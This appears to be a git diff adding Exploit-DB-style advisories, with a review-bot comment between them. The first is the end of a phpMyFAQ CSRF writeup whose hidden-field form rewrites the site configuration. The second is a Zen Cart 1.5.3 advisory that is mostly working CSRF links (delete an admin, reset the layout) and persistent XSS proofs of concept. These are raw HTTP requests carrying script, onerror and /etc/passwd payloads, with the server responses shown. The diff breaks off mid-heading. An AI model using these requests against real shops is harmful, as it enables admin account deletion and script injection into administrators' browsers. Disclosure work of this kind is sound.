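+- Add stopword
+
+http://localhost/phpmyfaq/admin/index.php?action=ajax&ajax=config&ajaxaction=save_stop_word&stopword=lolwut&stopwords_lang=en
+
+
+- Edit configuration
+
+Affected:
+Main configuration
+FAQ records configuration
+Search
+Security configuration
+Spam control center
+Social network configuration
+
+PoC:
+
+<html>
+<body>
+<form action="http://localhost/phpmyfaq/admin/?action=config&config_action=saveConfig" method="POST">
+<input type="hidden" name="edit[main.language]" value="language_en.php" />
+<input type="hidden" name="edit[main.languageDetection]" value="true" />
+<input type="hidden" name="edit[main.titleFAQ]" value="phpMyFAQ Codename Perdita" />
+<input type="hidden" name="edit[main.currentVersion]" value="2.8.12" />
+<input type="hidden" name="edit[main.metaDescription]" value="lolwat" />
+<input type="hidden" name="edit[main.metaKeywords]" value="" />
+<input type="hidden" name="edit[main.metaPublisher]" value="Whatever" />
+<input type="hidden" name="edit[main.administrationMail]" value="what@ever.com" />
+<input type="hidden" name="edit[main.contactInformations]" value="" />
+<input type="hidden" name="edit[main.send2friendText]" value="" />
+<input type="hidden" name="edit[main.enableUserTracking]" value="true" />
+<input type="hidden" name="edit[main.enableAdminLog]" value="true" />
+<input type="hidden" name="edit[main.referenceURL]" value="http://localhost/phpmyfaq" />
+<input type="hidden" name="edit[main.urlValidateInterval]" value="86400" />
+<input type="hidden" name="edit[main.enableWysiwygEditor]" value="true" />
+<input type="hidden" name="edit[main.templateSet]" value="default" />
+<input type="hidden" name="edit[main.dateFormat]" value="Y-m-d H:i" />
+<input type="hidden" name="edit[records.maxAttachmentSize]" value="100000" />
+<input type="hidden" name="edit[records.disableAttachments]" value="true" />
+<input type="hidden" name="edit[records.numberOfRecordsPerPage]" value="10" />
+<input type="hidden" name="edit[records.numberOfShownNewsEntries]" value="3" />
+<input type="hidden" name="edit[records.numberOfRelatedArticles]" value="5" />
+<input type="hidden" name="edit[records.orderby]" value="id" />
+<input type="hidden" name="edit[records.sortby]" value="DESC" />
+<input type="hidden" name="edit[records.attachmentsPath]" value="attachments" />
+<input type="hidden" name="edit[records.defaultAttachmentEncKey]" value="" />
+<input type="hidden" name="edit[records.orderingPopularFaqs]" value="visits" />
+<input type="hidden" name="edit[records.autosaveSecs]" value="180" />
+<input type="hidden" name="edit[search.numberSearchTerms]" value="10" />
+<input type="hidden" name="edit[search.relevance]" value="thema,content,keywords" />
+<input type="hidden" name="edit[security.bannedIPs]" value="" />
+<input type="hidden" name="edit[security.permLevel]" value="basic" />
+<input type="hidden" name="edit[security.ssoLogoutRedirect]" value="" />
+<input type="hidden" name="edit[spam.enableSafeEmail]" value="true" />
+<input type="hidden" name="edit[spam.checkBannedWords]" value="true" />
+<input type="hidden" name="edit[spam.enableCaptchaCode]" value="true" />
+<input type="hidden" name="edit[socialnetworks.twitterConsumerKey]" value="" />
+<input type="hidden" name="edit[socialnetworks.twitterConsumerSecret]" value="" />
+<input type="hidden" name="edit[socialnetworks.twitterAccessTokenKey]" value="" />
+<input type="hidden" name="edit[socialnetworks.twitterAccessTokenSecret]" value="" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>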
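Review bot: `#Date: 04.09.19` does not fit the rest of the file (the captured session row is dated `2014-09-04` and 2.8.12 is called the latest version), so it is presumably a typo for `04.09.14`. The 'Remote FAQ Disclosure' section asserts that the export works "even without having an account" but shows only the two request forms and no unauthenticated response, so the claim is unsupported as written; a captured response, or at least the status line and content-type, would substantiate it. The advisory gives no remediation for any of the three items; I would add a short line per section: HTML-encode the stored Referer and User-Agent when `viewsession` renders them (both are attacker-chosen request headers and must never be treated as trusted), enforce the admin login on `exportfile`, and require a per-session token on every state-changing admin action listed under CSRF. In the user-update PoC `last_modified` is set to the literal `undefined`, which looks like a copied browser default rather than a deliberate value and should be explained or dropped.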
712
platforms/php/webapps/34581.txt
Executable file
|
@ -0,0 +1,712 @@
|
|||
#Title: Zen Cart 1.5.3 - CSRF & Admin Panel XSS
|
||||
#Date: 09.07.14
|
||||
#Vendor: zen-cart.com
|
||||
#Tested on: Apache 2.2 [at] Linux
|
||||
#Contact: smash[at]devilteam.pl
|
||||
|
||||
#1 - CSRF
|
||||
|
||||
- Delete admin
|
||||
|
||||
GET profile stands for user id.
|
||||
|
||||
localhost/zen/zen-cart-v1.5.3-07042014/admin123/profiles.php?action=delete&profile=2
|
||||
|
||||
- Reset layout boxes to default
|
||||
|
||||
localhost/zen/zen-cart-v1.5.3-07042014/admin123/layout_controller.php?page=&cID=74&action=reset_defaults
|
||||
|
||||
|
||||
#2 - Persistent XSS in admin panel
|
||||
|
||||
Since admin privileges are required to execute following vulnerablities this is not a serious threat.
|
||||
|
||||
- Extras -> Media types -> Add
|
||||
|
||||
Vulnerable parameters - type_name & type_exit
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/media_types.php?page=1&mID=2&action=save HTTP/1.1
|
||||
Host: localhost
|
||||
Content-Type: multipart/form-data; boundary=---------------------------4978676881674017321390852339
|
||||
Content-Length: 663
|
||||
|
||||
-----------------------------4978676881674017321390852339
|
||||
Content-Disposition: form-data; name="securityToken"
|
||||
|
||||
b98019227f8014aed6d22b02f0748d11
|
||||
-----------------------------4978676881674017321390852339
|
||||
Content-Disposition: form-data; name="type_name"
|
||||
|
||||
<h1>sup<!--
|
||||
-----------------------------4978676881674017321390852339
|
||||
Content-Disposition: form-data; name="type_ext"
|
||||
|
||||
sup<>
|
||||
-----------------------------4978676881674017321390852339
|
||||
Content-Disposition: form-data; name="x"
|
||||
|
||||
19
|
||||
-----------------------------4978676881674017321390852339
|
||||
Content-Disposition: form-data; name="y"
|
||||
|
||||
13
|
||||
-----------------------------4978676881674017321390852339--
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent"><h1>sup<!--</td>
|
||||
<td class="dataTableContent">sup<></td>
|
||||
<td class="dataTableContent" align="right">
|
||||
(...)
|
||||
|
||||
- Extras -> Media manager -> Add
|
||||
|
||||
Vulnerable parameter - media_name
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/media_manager.php?page=1&mID=1&action=save HTTP/1.1
|
||||
Host: localhost
|
||||
Content-Type: multipart/form-data; boundary=---------------------------1835318161847256146721022401
|
||||
Content-Length: 5633
|
||||
|
||||
-----------------------------1835318161847256146721022401
|
||||
Content-Disposition: form-data; name="securityToken"
|
||||
|
||||
b98019227f8014aed6d22b02f0748d11
|
||||
-----------------------------1835318161847256146721022401
|
||||
Content-Disposition: form-data; name="media_name"
|
||||
|
||||
<script>alert(666)</script>
|
||||
-----------------------------1835318161847256146721022401
|
||||
Content-Disposition: form-data; name="x"
|
||||
|
||||
32
|
||||
-----------------------------1835318161847256146721022401
|
||||
Content-Disposition: form-data; name="y"
|
||||
|
||||
16
|
||||
-----------------------------1835318161847256146721022401
|
||||
Content-Disposition: form-data; name="clip_filename"; filename="cat.png"
|
||||
Content-Type: image/png
|
||||
|
||||
(image)
|
||||
|
||||
-----------------------------1835318161847256146721022401
|
||||
Content-Disposition: form-data; name="media_dir"
|
||||
|
||||
|
||||
-----------------------------1835318161847256146721022401
|
||||
Content-Disposition: form-data; name="media_type"
|
||||
|
||||
2
|
||||
-----------------------------1835318161847256146721022401--
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent"><script>alert(666)</script></td>
|
||||
<td class="dataTableContent" align="right">
|
||||
(...)
|
||||
<tr class="infoBoxHeading">
|
||||
<td class="infoBoxHeading"><strong><script>alert(666)</script></strong></td>
|
||||
</tr>
|
||||
|
||||
- Extras -> Music genre -> Add
|
||||
|
||||
Vulenrable parameter - music_genre_name
|
||||
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/music_genre.php?action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
Content-Type: multipart/form-data; boundary=---------------------------202746648818048680751007920584
|
||||
Content-Length: 581
|
||||
|
||||
-----------------------------202746648818048680751007920584
|
||||
Content-Disposition: form-data; name="securityToken"
|
||||
|
||||
b98019227f8014aed6d22b02f0748d11
|
||||
-----------------------------202746648818048680751007920584
|
||||
Content-Disposition: form-data; name="music_genre_name"
|
||||
|
||||
<script>alert(666)</script>
|
||||
-----------------------------202746648818048680751007920584
|
||||
Content-Disposition: form-data; name="x"
|
||||
|
||||
37
|
||||
-----------------------------202746648818048680751007920584
|
||||
Content-Disposition: form-data; name="y"
|
||||
|
||||
10
|
||||
-----------------------------202746648818048680751007920584--
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/music_genre.php?page=1&mID=1&action=edit'">
|
||||
<td class="dataTableContent"><script>alert(666)</script></td>
|
||||
<td class="dataTableContent" align="right">
|
||||
(...)
|
||||
<tr class="infoBoxHeading">
|
||||
<td class="infoBoxHeading"><b><script>alert(666)</script></b></td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
Further vuln:
|
||||
http://localhost/zen/zen-cart-v1.5.3-07042014/index.php?main_page=index&typefilter=music_genre&music_genre_id=1
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<div id="navBreadCrumb"> <a href="http://localhost/zen/zen-cart-v1.5.3-07042014/">Home</a>&nbps;::&nbps;
|
||||
<script>alert(666)</script>
|
||||
</div>
|
||||
(...)
|
||||
|
||||
- Extras -> Record companies -> Add
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/record_company.php?action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
Content-Type: multipart/form-data; boundary=---------------------------19884630671863875697751588711
|
||||
Content-Length: 5828
|
||||
|
||||
-----------------------------19884630671863875697751588711
|
||||
Content-Disposition: form-data; name="securityToken"
|
||||
|
||||
b98019227f8014aed6d22b02f0748d11
|
||||
-----------------------------19884630671863875697751588711
|
||||
Content-Disposition: form-data; name="record_company_name"
|
||||
|
||||
<script>alert(666)</script>
|
||||
-----------------------------19884630671863875697751588711
|
||||
Content-Disposition: form-data; name="record_company_image"; filename="<img src=# onerror=alert(1)>.png"
|
||||
Content-Type: image/png
|
||||
|
||||
-----------------------------19884630671863875697751588711
|
||||
Content-Disposition: form-data; name="img_dir"
|
||||
|
||||
categories/
|
||||
-----------------------------19884630671863875697751588711
|
||||
Content-Disposition: form-data; name="record_company_image_manual"
|
||||
|
||||
/etc/passwd
|
||||
-----------------------------19884630671863875697751588711
|
||||
Content-Disposition: form-data; name="record_company_url[1]"
|
||||
|
||||
'>"><>XSS
|
||||
-----------------------------19884630671863875697751588711
|
||||
Content-Disposition: form-data; name="x"
|
||||
|
||||
21
|
||||
-----------------------------19884630671863875697751588711
|
||||
Content-Disposition: form-data; name="y"
|
||||
|
||||
13
|
||||
-----------------------------19884630671863875697751588711--
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent"><script>alert(666)</script></td>
|
||||
<td class="dataTableContent" align="right">
|
||||
(...)
|
||||
<tr class="infoBoxHeading">
|
||||
<td class="infoBoxHeading"><b><script>alert(666)</script></b></td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
Further vuln:
|
||||
http://localhost/zen/zen-cart-v1.5.3-07042014/index.php?main_page=index&typefilter=music_genre&music_genre_id=1
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<div id="navBreadCrumb"> <a href="http://localhost/zen/zen-cart-v1.5.3-07042014/">Home</a>&nbps;::&nbps;
|
||||
<script>alert(666)</script>
|
||||
</div>
|
||||
<div class="centerColumn" id="indexProductList">
|
||||
<h1 id="productListHeading"><script>alert(666)</script></h1>
|
||||
(...)
|
||||
|
||||
- Extras -> Recording Artists -> Add
|
||||
|
||||
Vulnerable parameter - artists_name
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/record_artists.php?action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
Content-Type: multipart/form-data; boundary=---------------------------14015448418946681711346093460
|
||||
Content-Length: 1099
|
||||
|
||||
-----------------------------14015448418946681711346093460
|
||||
Content-Disposition: form-data; name="securityToken"
|
||||
|
||||
84c8fe52eb9b3b0e026b5438e1c21f6f
|
||||
-----------------------------14015448418946681711346093460
|
||||
Content-Disposition: form-data; name="artists_name"
|
||||
|
||||
<script>alert(666)</script>
|
||||
-----------------------------14015448418946681711346093460
|
||||
(Content-Disposition: form-data; name="artists_image"; filename=""
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
|
||||
-----------------------------14015448418946681711346093460
|
||||
Content-Disposition: form-data; name="img_dir"
|
||||
|
||||
|
||||
-----------------------------14015448418946681711346093460
|
||||
Content-Disposition: form-data; name="artists_image_manual"
|
||||
|
||||
|
||||
-----------------------------14015448418946681711346093460
|
||||
Content-Disposition: form-data; name="artists_url[1]"
|
||||
|
||||
|
||||
-----------------------------14015448418946681711346093460
|
||||
Content-Disposition: form-data; name="x"
|
||||
|
||||
39
|
||||
-----------------------------14015448418946681711346093460
|
||||
Content-Disposition: form-data; name="y"
|
||||
|
||||
19
|
||||
-----------------------------14015448418946681711346093460--)
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent"><script>alert(666)</script></td>
|
||||
<td class="dataTableContent" align="right">
|
||||
(...)
|
||||
<tr class="infoBoxHeading">
|
||||
<td class="infoBoxHeading"><b><script>alert(666)</script></b></td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
- Gift Certificate/Coupons -> Coupon admin -> Add
|
||||
|
||||
Vulnerable parameters - coupon_name, coupon_desc, coupon_amount, coupon_min_order, coupon_code, coupon_uses_coupon, coupon_uses_user
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/coupon_admin.php?action=update&oldaction=new&cid=0&page=0 HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
securityToken=84c8fe52eb9b3b0e026b5438e1c21f6f&coupon_name%5B1%5D=%27%3E%22%3E%3C%3EXSSD&coupon_desc%5B1%5D=%27%3E%22%3E%3C%3EXSSD&coupon_amount=%27%3E%22%3E%3C%3EXSSD&coupon_min_order=%27%3E%22%3E%3C%3EXSSD&coupon_free_ship=on&coupon_code=%27%3E%22%3E%3C%3EXSSD&coupon_uses_coupon=%27%3E%22%3E%3C%3EXSSD&coupon_uses_user=%27%3E%22%3E%3C%3EXSSD&coupon_startdate_day=9&coupon_startdate_month=7&coupon_startdate_year=2014&coupon_finishdate_day=9&coupon_finishdate_month=7&coupon_finishdate_year=2015&coupon_zone_restriction=1&x=62&y=10
|
||||
|
||||
Response:
|
||||
(...)
|
||||
|
||||
<tr>
|
||||
<td align="left">Coupon Name</td>
|
||||
<td align="left">'>"><>XSSD</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td align="left">Coupon Description <br />(Customer can see)</td>
|
||||
<td align="left">'>"><>XSSD</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td align="left">Coupon Amount</td>
|
||||
<td align="left"></td>
|
||||
</tr>
|
||||
|
||||
<tr>
|
||||
<td align="left">Coupon Minimum Order</td>
|
||||
<td align="left">'>"><>XSSD</td>
|
||||
</tr>
|
||||
|
||||
<tr>
|
||||
<td align="left">Free Shipping</td>
|
||||
<td align="left">Free Shipping</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td align="left">Coupon Code</td>
|
||||
<td align="left">'>"><>XSSD</td>
|
||||
</tr>
|
||||
|
||||
<tr>
|
||||
<td align="left">Uses per Coupon</td>
|
||||
<td align="left">'>"><>XSSD</td>
|
||||
</tr>
|
||||
|
||||
<tr>
|
||||
<td align="left">Uses per Customer</td>
|
||||
<td align="left">'>"><>XSSD</td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
- Gift Certificate/Coupons -> Mail gift certificate -> Send
|
||||
|
||||
Vulnerable parameter - email_to
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/gv_mail.php?action=preview HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
securityToken=84c8fe52eb9b3b0e026b5438e1c21f6f&customers_email_address=Active+customers+in+past+3+months+%28Subscribers%29&email_to=%27%3E%22%3E%3C%3EXSSED&from=szit%40szit.in&subject=asdf&amount=666&message=asdf&x=13&y=12
|
||||
|
||||
Response:
|
||||
(...)
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="smallText"><b>Customer:</b><br />'>"><>XSSED</td>
|
||||
</tr>
|
||||
<tr>
|
||||
(...)
|
||||
|
||||
- Tools -> Banner manager -> Add
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/banner_manager.php?page=1&action=add HTTP/1.1
|
||||
Host: localhost
|
||||
Content-Type: multipart/form-data; boundary=---------------------------3847719184268426731396009422
|
||||
Content-Length: 2317
|
||||
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="securityToken"
|
||||
|
||||
84c8fe52eb9b3b0e026b5438e1c21f6f
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="status"
|
||||
|
||||
1
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="banners_open_new_windows"
|
||||
|
||||
0
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="banners_on_ssl"
|
||||
|
||||
1
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="banners_title"
|
||||
|
||||
'>"><>XSS
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="banners_url"
|
||||
|
||||
'>"><>XSS
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="banners_group"
|
||||
|
||||
BannersAll
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="new_banners_group"
|
||||
|
||||
'>"><>XSS
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="banners_image"; filename=""
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="banners_image_local"
|
||||
|
||||
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="banners_image_target"
|
||||
|
||||
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="banners_html_text"
|
||||
|
||||
'>"><>XSS
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="banners_sort_order"
|
||||
|
||||
15
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="date_scheduled"
|
||||
|
||||
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="expires_date"
|
||||
|
||||
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="expires_impressions"
|
||||
|
||||
0
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="x"
|
||||
|
||||
9
|
||||
-----------------------------3847719184268426731396009422
|
||||
Content-Disposition: form-data; name="y"
|
||||
|
||||
7
|
||||
-----------------------------3847719184268426731396009422--
|
||||
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent"><a href="javascript:popupImageWindow('popup_image.php?banner=10')"><img src="images/icon_popup.gif" border="0" alt="View Banner" title=" View Banner "></a>&nbps;'>"><>XSS</td>
|
||||
<td class="dataTableContent" align="right">'>"><>XSS</td>
|
||||
<td class="dataTableContent" align="right">0 / 0</td>
|
||||
(...)
|
||||
<tr class="infoBoxHeading">
|
||||
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
- Tools -> Newsletter and Product Notifications Manager -> New newsletter
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/newsletters.php?action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
securityToken=93867dff1d912bde757ce2bc0ac94425&module=newsletter&title=%27%3E%22%3E%3C%3EXSS&message_html=%27%3E%22%3E%3C%3EXSS&content=%27%3E%22%3E%3C%3EXSS&x=32&y=8
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent"><a href="http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/newsletters.php?page=1&nID=1&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title=" Preview "></a>&nbps;'>"><>XSS</td>
|
||||
<td class="dataTableContent" align="right">18 bytes</td>
|
||||
(...)
|
||||
<table border="0" width="100%" cellspacing="0" cellpadding="2">
|
||||
<tr class="infoBoxHeading">
|
||||
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
- Tools -> EZ-Pages -> New file
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/ezpages.php?action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
Content-Type: multipart/form-data; boundary=---------------------------134785397313015614741294511591
|
||||
Content-Length: 2253
|
||||
|
||||
-----------------------------134785397313015614741294511591
|
||||
Content-Disposition: form-data; name="securityToken"
|
||||
|
||||
c74a83cefbb5ffc1868dd4a390bd0880
|
||||
-----------------------------134785397313015614741294511591
|
||||
Content-Disposition: form-data; name="x"
|
||||
|
||||
41
|
||||
-----------------------------134785397313015614741294511591
|
||||
Content-Disposition: form-data; name="y"
|
||||
|
||||
17
|
||||
-----------------------------134785397313015614741294511591
|
||||
Content-Disposition: form-data; name="pages_title"
|
||||
|
||||
'>"><>XSS
|
||||
-----------------------------134785397313015614741294511591
|
||||
Content-Disposition: form-data; name="page_open_new_window"
|
||||
|
||||
0
|
||||
-----------------------------134785397313015614741294511591
|
||||
|
||||
(...)
|
||||
|
||||
-----------------------------134785397313015614741294511591
|
||||
Content-Disposition: form-data; name="pages_html_text"
|
||||
|
||||
'>"><>XSS
|
||||
-----------------------------134785397313015614741294511591
|
||||
Content-Disposition: form-data; name="alt_url"
|
||||
|
||||
|
||||
-----------------------------134785397313015614741294511591
|
||||
Content-Disposition: form-data; name="alt_url_external"
|
||||
|
||||
|
||||
-----------------------------134785397313015614741294511591--
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent" width="75px" align="right">&nbps;1</td>
|
||||
<td class="dataTableContent">&nbps;'>"><>XSS</td>
|
||||
(...)
|
||||
<tr class="infoBoxHeading">
|
||||
<td class="infoBoxHeading"><b>Title:&nbps;'>"><>XSS&nbps;|&nbps;Prev/Next Chapter:&nbps;0</b></td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
- Localization -> Currencies -> New currency
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/currencies.php?page=1&action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&title=%27%3E%22%3E%3C%3EXSS&code=%27%3E%22%3E%3C%3EXSS&symbol_left=%27%3E%22%3E%3C%3EXSS&symbol_right=%27%3E%22%3E%3C%3EXSS&decimal_point=%27%3E%22%3E%3C%3EXSS&thousands_point=%27%3E%22%3E%3C%3EXSS&decimal_places=%27%3E%22%3E%3C%3EXSS&value=%27%3E%22%3E%3C%3EXSS&x=13&y=15
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent">'>"><>XSS</td>
|
||||
<td class="dataTableContent">'>"</td>
|
||||
(...)
|
||||
<tr class="infoBoxHeading">
|
||||
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
|
||||
</tr>
|
||||
(...)
|
||||
<tr>
|
||||
<td class="infoBoxContent"><br>Title: '>"><>XSS</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="infoBoxContent">Code: '>"</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="infoBoxContent"><br>Symbol Left: '>"><>XSS</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="infoBoxContent">Symbol Right: '>"><>XSS</td>
|
||||
</tr>
|
||||
(...)
|
||||
<tr>
|
||||
<td class="infoBoxContent"><br>Example Output:<br>$30.00 = '>"><>XSS0'>"><>XSS</td>
|
||||
</tr>
|
||||
</table>
|
||||
(...)
|
||||
<tr>
|
||||
<td class="infoBoxContent"><br>Example Output:<br>$30.00 = '>"><>XSS0'>"><>XSS</td>
|
||||
</tr>
|
||||
|
||||
- Localization -> Languages -> New language
|
||||
|
||||
Affects big part of admin panel.
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/languages.php?action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&name=%27%3E%22%3E%3C%3EXSS&code=xs&image=icon.gif&directory=%27%3E%22%3E%3C%3EXSS&sort_order=%27%3E%22%3E%3C%3EXSS&x=40&y=20
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="messageStackCaution"><img src="images/icons/warning.gif" border="0" alt="Warning" title=" Warning ">&nbps;MISSING LANGUAGE FILES OR DIRECTORIES ... '>"><>XSS '>"><>XSS</td>
|
||||
</tr>
|
||||
</table>
|
||||
(...)
|
||||
<td class="dataTableContent">'>"><>XSS</td>
|
||||
<td class="dataTableContent">xs</td>
|
||||
(...)
|
||||
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
|
||||
</tr>
|
||||
(...)
|
||||
<tr>
|
||||
<td class="infoBoxContent"><br>Name: '>"><>XSS</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="infoBoxContent">Code: xs</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="infoBoxContent"><br><img src="http://localhost/zen/zen-cart-v1.5.3-07042014/includes/languages/'>"><>XSS/images/icon.gif" border="0" alt="'>"><>XSS" title=" '>"><>XSS "></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="infoBoxContent"><br>Directory:<br>http://localhost/zen/zen-cart-v1.5.3-07042014/includes/languages/<b>'>"><>XSS</b></td>
|
||||
</tr>
|
||||
(...)
|
||||
|
||||
Further injection:
|
||||
http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/orders_status.php
|
||||
|
||||
- Localization -> Orders status -> Insert
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/orders_status.php?page=1&action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&orders_status_name%5B2%5D=%27%3E%22%3E%3C%3EXSS&orders_status_name%5B1%5D=%27%3E%22%3E%3C%3EXSS&x=9&y=7
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/orders_status.php?page=1&oID=5&action=edit'">
|
||||
<td class="dataTableContent">'>"><>XSS</td>
|
||||
<td class="dataTableContent" align="right"><img src="images/icon_arrow_right.gif" border="0" alt="">&nbps;</td>
|
||||
(...)
|
||||
|
||||
- Locations / Taxes -> Zones -> New zone
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/zones.php?page=1&action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&zone_name=%27%3E%22%3E%3C%3EXSS&zone_code=%27%3E%22%3E%3C%3EXSS&zone_country_id=247&x=17&y=11
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent">'>"><>XSS</td>
|
||||
<td class="dataTableContent">'>"><>XSS</td>
|
||||
<td class="dataTableContent" align="center">'>"><>XSS</td>
|
||||
(...)
|
||||
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
|
||||
</tr>
|
||||
</table>
|
||||
(...)
|
||||
<tr>
|
||||
<td class="infoBoxContent"><br>Zones Name:<br>'>"><>XSS ('>"><>XSS)</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="infoBoxContent"><br>Country: '>"><>XSS</td>
|
||||
|
||||
- - Locations / Taxes -> Zone definitions -> Insert
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/geo_zones.php?zpage=1&zID=1&action=insert_zone HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&geo_zone_name=%27%3E%22%3E%3C%3EXSS&geo_zone_description=%27%3E%22%3E%3C%3EXSS&x=25&y=13
|
||||
|
||||
Response:
|
||||
(...)
|
||||
</a>&nbps;'>"><>XSS</td>
|
||||
<td class="dataTableContent">'>"><>XSS</td>
|
||||
(...)
|
||||
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
|
||||
(...)
|
||||
<td class="infoBoxContent"><br>Description:<br>'>"><>XSS</td>
|
||||
|
||||
- Locations / Taxes -> Tax Classes -> New tax class
|
||||
|
||||
Request:
|
||||
POST /zen/zen-cart-v1.5.3-07042014/admin123/tax_classes.php?page=1&action=insert HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
securityToken=c74a83cefbb5ffc1868dd4a390bd0880&tax_class_title=%27%3E%22%3E%3C%3EXSS&tax_class_description=%27%3E%22%3E%3C%3EXSS&x=33&y=9
|
||||
|
||||
Response:
|
||||
(...)
|
||||
<td class="dataTableContent">'>"><>XSS</td>
|
||||
(...)
|
||||
<td class="infoBoxHeading"><b>'>"><>XSS</b></td>
|
||||
(...)
|
||||
<td class="infoBoxContent"><br>Description:<br>'>"><>XSS</td>
|
||||
(...)
|
||||
|
||||
- - Locations / Taxes -> Tax Rates -> New tax rate
|
